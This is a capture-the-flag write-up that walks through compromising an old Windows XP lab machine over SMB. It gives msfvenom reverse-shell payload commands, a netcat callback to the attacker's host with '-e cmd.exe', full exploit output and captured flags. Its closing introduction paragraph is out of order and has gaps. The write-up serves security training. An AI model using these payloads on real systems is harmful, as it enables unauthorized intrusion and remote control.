It seems the script requires an executable file to which contains the payload to be executed on the target. I can generate it using msfvenom:
msfvenom -p windows/shell/reverse_tcp LHOST=<my-ip> LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows > exploit.exe
I can now use the exploit script:
python zzz_exploit.py 10.10.10.4 exploit.exe
Upload and execute mode: ../exploit.exe
Target OS: Windows 5.1
No named pipe was specified explicitly via the NAMED_PIPE env variable, trying to auto-detect
Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x81fe1da8
SESSION: 0xe11808d8
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe10e0378
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe10e0418
overwriting token UserAndGroups
Uploading payload
Executing payload as a service
Doing service exec
Got DCE RPC handle
DCE RPC connected
And bound
Opening SVCManager on 10.10.10.4.....
Creating service BBec.....
We got a service handle, starting BBec.....
Safe to ignore if you executed a non-service
The NETBIOS connection with the remote host timed out.
Removing service BBec.....
ServiceExec Error on: 10.10.10.4
nca_s_proto_error
Done
On my listener, I get a connection but it instantly dies when I type anything:
sif0@kali:~/htb/retired/Legacy-10.10.10.4$ sudo nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.4] 1039
whoami
sif0@kali:~/htb/retired/Legacy-10.10.10.4$
After trying numerous times, I get the same behavior. Knowing that I got code execution but maybe the process dies quickly. I opted to use a different payload, not that requires a process to be alive. I used the payload windows/exec rather than windows/shell/reverse_tcp:
msfvenom -p windows/exec cmd='\\10.10.14.7\smb\nc.exe 10.10.14.7 9001 -e cmd.exe' EXITFUNC=thread -f exe -a x86 --platform windows > exec-exploit.exe
This commands creates an executable that will trigger a payload that executes an SMB connection to my machine, executing the binary nc.exe using the parameters provided. Setting up my smb share using impacket's smbserver.py:
sif0@kali:~/htb/retired/Legacy-10.10.10.4$ nc -nvlp 9001 (1 results) [3932/3932]
listening on [any] 9001 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.4] 1045
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>whoami
whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.
For whatever reason, whoami doesn't work. Its because it is not pre-installed in Windows XP I think and requires installing a tool pack. I also tried a few commands to determine the current user, but all of them failed:
C:\WINDOWS\system32>echo %USERNAME%
echo %USERNAME%
%USERNAME%
C:\WINDOWS\system32>echo %userdomain%
echo %userdomain%
%userdomain%
C:\WINDOWS\system32>sysinfo
sysinfo
'sysinfo' is not recognized as an internal or external command,
operable program or batch file.
I then just tried my luck if I have access to the Administrator\Desktop directory, which I do:
C:\Documents and Settings\Administrator>dir Desktop
dir Desktop
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings\Administrator\Desktop
16/03/2017 09:18 <DIR> .
16/03/2017 09:18 <DIR> ..
16/03/2017 09:18 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 6.400.622.592 bytes free
I can also read root.txt:
C:\Documents and Settings\Administrator>type Desktop\root.txt
type Desktop\root.txt
993442d258b0e0ec917cae9e695d5713
Checking the users under the directory Documents and Settings, I found that the user john has the user.txt on his Desktop folder:
C:\Documents and Settings>dir john\Desktop\
dir john\Desktop\
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings\john\Desktop
16/03/2017 09:19 <DIR> .
16/03/2017 09:19 <DIR> ..
16/03/2017 09:19 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 6.400.618.496 bytes free
I can now read user.txt:
C:\Documents and Settings>type john\desktop\user.txt
type john\desktop\user.txt
e69af0e4f443d...
Takeaways
Legacy boxes like this are vulnerable to many exploits, but finding a working exploit that doesn't require the use of a Metasploit module can take you some time.
Since legacy version have many exploits available, it can be cumbersome to find which exploit you really need or want.
If you get code execution but your process dies quickly, try to use a payload that executes a command that can get you a shell.
Based on the scan results, the Windows OS is XP (Windows 2000 LAN Manager), which is a very outdated version of Windows and has lots of vulnerabilities. Thinking that this might be vulnerable to , I used searchsploit to find a POC exploit:
It seems like any of these 3 exploits will work. I tried 2 of them and I wasn't able to get them to work(maybe I was just stupid). Eventually after Googling, I ended up with this , and got a working to work:
